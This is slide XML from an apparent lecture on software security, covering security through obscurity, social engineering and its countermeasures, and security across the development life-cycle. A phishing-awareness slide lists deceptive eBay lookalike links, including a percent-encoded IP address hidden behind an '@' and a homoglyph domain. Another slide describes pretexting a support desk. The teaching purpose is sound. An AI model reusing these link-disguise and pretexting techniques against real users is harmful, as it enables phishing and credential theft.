            <a:ext cx="6980238" cy="523716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 bwMode="auto">
          <a:xfrm rot="502149">
            <a:off x="5368925" y="1322388"/>
            <a:ext cx="3621088" cy="132556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Incomplete protection measures that become “temporary” forever</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2662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through obscurity … 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i="1" smtClean="0"/>
              <a:t>Security through obscurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> – hiding design </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>or implementation details to gain security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>keeping secret not the key, but the encryption algorithm,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>hiding a DB server under a name different from “db”, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>The idea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doesn’t work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>it’s difficult to keep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secrets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>(e.g. source code gets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stolen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>if security of a system depends on one secret, then, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>once it’s no longer a secret, the whole system is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>secret algorithms, protocols etc. will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reviewed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> flaws won’t be spotted and fixed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>less security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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z="2300" smtClean="0"/>
              <a:t>Systems should be secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by design</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>, not by obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="210000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> obscurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28676" name="Picture 4" descr="MCj023252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651000"/>
            <a:ext cx="1185862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Bruce Schneier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Secrets and Lies: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	Digital Security </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	in a Networked World</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31748" name="Picture 4" descr="cover-sandl-200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1838325"/>
            <a:ext cx="197643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threats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22845" y="1073597"/>
            <a:ext cx="6605929" cy="5163715"/>
            <a:chOff x="2071" y="941"/>
            <a:chExt cx="4176" cy="326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2071" y="941"/>
              <a:ext cx="4176" cy="3264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798" name="Picture 6" descr="worldhun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5" y="1085"/>
              <a:ext cx="3912" cy="2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0729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 this OK?</a:t>
            </a:r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73" y="980728"/>
            <a:ext cx="8099591" cy="5424383"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194206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threats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2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting human nature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>: tendency to trust, fear etc.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Human is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weakest element</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> of most security systems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Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to gain unauthorized access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> to systems or information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Deceiving, manipulating, influencing people, abusing their trust </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>so that they do something they wouldn’t normally do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Most common: phishing, hoaxes, fake URLs and web sites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Also: cheating over a phone, gaining physical access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example: requesting e-mail password change by calling technical support (pretending to be an angry boss)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Often using (semi-)public information to gain more knowledge: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employees’ names, who’s on a leave, what’s the hierarchy, projects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people get easily persuaded to give out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>information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everyone knows valuable pieces of information, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>not only the management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– reducing risks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Clear, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>understandable security policies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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>procedures</a:t>
            </a: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Education</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, training, awareness raising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Who to trust? Who not to trust? How to distinguish?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not all non-secret information should be public</a:t>
            </a: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Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> shouldn’t let people do stupid things:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Warn when necessary, but not more often</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid ambiguity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t expect users to take right security decisions</a:t>
            </a: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Think as user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, see how people use your software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software engineers think different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>than</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Request an external audit?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– reducing risks</a:t>
            </a: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755576" y="1412776"/>
            <a:ext cx="7705725" cy="439261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sz="2400"/>
              <a:t>Which links point to eBay?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" u="sng"/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827014" y="2062063"/>
            <a:ext cx="7561262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secure-ebay.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000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www.ebay.com\cgi-bin\login?ds=1%204324@%31%32%34.%3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pP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1%33%36%2e%31%30%2e%32%30%33/p?uh3f223d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000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www.ebaỵ.com/ws/eBayISAPI.dll?SignIn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" u="sng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scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo&amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
            </a:b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siteid=0&amp;co_partnerid=2&amp;usage=0&amp;ru=http%3A%2F</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
            </a:b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%2Fwww.ebay.com&amp;rafId=0&amp;encRafId=default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="200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33390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7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7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7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7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7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7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7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7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7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7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/>
      <p:bldP spid="137220" grpId="1" animBg="1"/>
      <p:bldP spid="137221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Kevin D. Mitnick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The Art of Deception: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	Controlling the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	Human Element </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	of Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36868" name="Picture 4" descr="cover-a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1838325"/>
            <a:ext cx="19685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16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Computer security – what is it?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Software security – what can we do?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/>
              <a:t>Web security – how bad is it?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is vulnerable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67545" y="785813"/>
            <a:ext cx="7533456" cy="5739531"/>
            <a:chOff x="467545" y="785813"/>
            <a:chExt cx="7533456" cy="573953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5060" name="Rectangle 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="467545" y="785813"/>
              <a:ext cx="7533456" cy="5739531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/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
                <a:t>Secunia</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
                <a:t> security advisories from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0"/>
                <a:t>a single day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55124" y="1268760"/>
              <a:ext cx="6713220" cy="5154528"/>
              <a:chOff x="1259632" y="1340768"/>
              <a:chExt cx="6713220" cy="515452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9632" y="1340768"/>
                <a:ext cx="6713220" cy="15240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9632" y="2852936"/>
                <a:ext cx="6713220" cy="36423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8179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to start?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Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> should be foreseen as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>part of the system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> from the very beginning, not added as a layer at the end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>the latter solution produces insecure code </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(tricky patches instead of neat solutions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>it may limit functionality </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and will cost much more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>add security in version 2.0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Software development life-cycle</a:t>
            </a:r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auto">
          <a:xfrm>
            <a:off x="412750" y="1838325"/>
            <a:ext cx="2292350" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50139"/>
              <a:gd name="adj2" fmla="val -24755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requirements</a:t>
            </a:r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1173163" y="2460625"/>
            <a:ext cx="2292350" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49861"/>
              <a:gd name="adj2" fmla="val 21148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design</a:t>
            </a:r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>
            <a:off x="1933575" y="3082925"/>
            <a:ext cx="2292350" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49861"/>
              <a:gd name="adj2" fmla="val 15903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implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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2693988" y="3705225"/>
            <a:ext cx="2292350" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50139"/>
              <a:gd name="adj2" fmla="val 18528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testing</a:t>
            </a:r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3454400" y="4327525"/>
            <a:ext cx="2292350" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50139"/>
              <a:gd name="adj2" fmla="val 17213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deployment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4211638" y="4949825"/>
            <a:ext cx="2365375" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49931"/>
              <a:gd name="adj2" fmla="val 15903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maintenance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 rot="5400000">
            <a:off x="2809081" y="2047082"/>
            <a:ext cx="346075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 rot="5400000">
            <a:off x="3569494" y="2634457"/>
            <a:ext cx="346075" cy="414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5067" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4329906" y="3256757"/>
            <a:ext cx="346075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5068" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5090319" y="3879057"/>
            <a:ext cx="346075" cy="414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5069" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5851525" y="4500563"/>
            <a:ext cx="344487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9454" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="793750" y="4579938"/>
            <a:ext cx="739775" cy="787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9455" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5124450" y="1355725"/>
            <a:ext cx="1797050" cy="966788"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69389"/>
              <a:gd name="adj2" fmla="val 8720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This isn’t new…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189456" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5954713" y="2184400"/>
            <a:ext cx="2419350" cy="1658938"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49986"/>
              <a:gd name="adj2" fmla="val -2013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The message is:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1"/>
              <a:t>security is </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1"/>
              <a:t>an issue </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1"/>
              <a:t>in each phase!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189457" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6853238" y="3705225"/>
            <a:ext cx="1935162" cy="1174750"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49838"/>
              <a:gd name="adj2" fmla="val -2542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Hopefully </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>it is obvious as well </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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9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9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9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54" grpId="0" animBg="1"/>
      <p:bldP spid="189455" grpId="0" animBg="1"/>
      <p:bldP spid="189456" grpId="0" animBg="1"/>
      <p:bldP spid="1894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Requirements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Results of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threat modeling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>risk assessment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>what data and what resources should be protected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>against what</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>and from whom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	should appear in system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requirements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Architecture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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modularity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: divide program into semi-independent parts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small, well-defined interfaces to each module/function</a:t>
            </a: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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Isolation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: each part should work correctly </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>even if others fail (return wrong results,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send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>requests with invalid arguments)</a:t>
            </a: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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defense </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in depth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: build multiple layers of defense</a:t>
            </a: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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Simplicity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(complex =&gt; insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47108" name="Picture 4" descr="MCj023365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64904"/>
            <a:ext cx="1271588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 this OK?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50825" y="1031875"/>
            <a:ext cx="8713788" cy="5183188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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 err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set_non_root_uid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unsigned </a:t>
            </a:r>
            <a:r>
